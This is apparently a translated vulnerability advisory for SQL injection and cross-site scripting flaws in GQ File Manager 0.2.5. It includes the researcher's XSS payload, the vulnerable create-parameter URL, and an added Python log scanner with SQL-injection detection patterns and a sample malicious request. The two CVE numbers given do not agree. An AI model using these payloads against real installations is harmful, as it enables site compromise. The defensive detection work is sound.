
GQ File Manager index.php SQL Injection Vulnerability

Published: 2015-01-19 14:04:08

CVE-ID: CVE-2014-9445
Release date: 2014-12-31
Update date: 2015-01-12
Affected systems:
installatron GQ File Manager 0.2.5
Details:

GQ File Manager is an open-source file management application for web hosting space.


The incl/create.inc.php file in Installatron GQ File Manager 0.2.5 contains a SQL injection vulnerability; a remote attacker can exploit it through the create parameter of index.php to execute arbitrary SQL commands.


Source:
TaurusOmar
Test method:
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves! TaurusOmar provided the following test method:


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

INDEPENDENT SECURITY RESEARCHER

PENETRATION TESTING SECURITY

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerabilities

# Date: 19/12/2014

# Url Vendor: http://installatron.com/phpfilemanager

# Vendor Name: GQ File Manager

# Version: 0.2.5

# CVE: CVE-2014-1137

# Author: TaurusOmar

# Twitter: @TaurusOmar_

# Email: taurusomar13@gmail.com

# Home: overhat.blogspot.com

# Tested On: Bugtraq Optimus

# Risk: High


Description

GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.


------------------------

+ CROSS SITE SCRIPTING +

------------------------

# Exploiting Description - Create a new file, for example "xss.html", and insert the XSS code in the document


Input:

"><img src=x onerror=;;alert('XSS') />

Output:

<br />

<b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />

"><img src=x onerror=alert("xss");>


#P0c

"><img src=x onerror=;;alert('XSS') />


#Proof Concept

http://i.imgur.com/cjIvR5l.jpg


------------------------

+ Sql Injection +

------------------------

# Exploiting Description - The Sql Injection is in the path that creates a new file.


#P0c

http://site.com/GQFileManager/index.php?&&output=create&create=[sql]


#Proof Concept

http://i.imgur.com/IJZoDVt.jpg
Solution:
Vendor patch:

installatron
------------
The vendor has not yet released a patch or upgrade program. Users of this software are advised to keep an eye on the vendor's homepage for the latest version:

http://installatron.com/gatequestfilemanager?s=VLOAgK3AWmIAAC4tHn8AAAAB
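Since no vendor fix is listed, one defensive step is to watch web-server access logs for requests that reach the affected index.php create action with SQL metacharacters in the create parameter. The following detector is an added example, not part of this advisory or of GQ File Manager; the combined log format, the indicator list and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Assumed Apache/nginx "combined" access-log layout (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Heuristic SQL-injection indicators: quote/comment characters and common keywords.
# A file name such as "select.txt" also matches, so treat hits as leads, not proof.
SQLI_RE = re.compile(
    r"""['"`;]|--|/\*|\b(union|select|insert|update|delete|drop)\b""", re.I
)

def parse_line(line):
    """Split one access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs URL-decodes values and drops the empty names produced by "?&&".
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def flag_create_sqli(line):
    """Return details of a suspicious index.php create request, else None."""
    rec = parse_line(line)
    if rec is None or not rec["path"].endswith("/index.php"):
        return None
    q = rec["query"]
    # Only output=create with a create parameter reaches incl/create.inc.php.
    if "create" not in q.get("output", []) or "create" not in q:
        return None
    for value in q["create"]:
        if SQLI_RE.search(value):
            return {"ip": rec["ip"], "time": rec["time"], "create": value}
    return None

def scan(lines):
    return [hit for hit in map(flag_create_sqli, lines) if hit]

# Constructed sample lines: a benign create, a suspicious create, an unrelated edit.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Dec/2014:10:01:02 +0000] "GET /GQFileManager/index.php'
    '?output=create&create=notes.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [19/Dec/2014:10:02:45 +0000] "GET /GQFileManager/index.php'
    '?&&output=create&create=report%27%3B-- HTTP/1.1" 200 734',
    '203.0.113.5 - - [19/Dec/2014:10:03:10 +0000] "GET /GQFileManager/index.php'
    '?output=edit&file=readme.txt HTTP/1.1" 200 301',
]
```

Running `scan(SAMPLE_LOG)` returns only the second line as a hit; a real deployment would feed the function the live access log and forward hits to the SIEM.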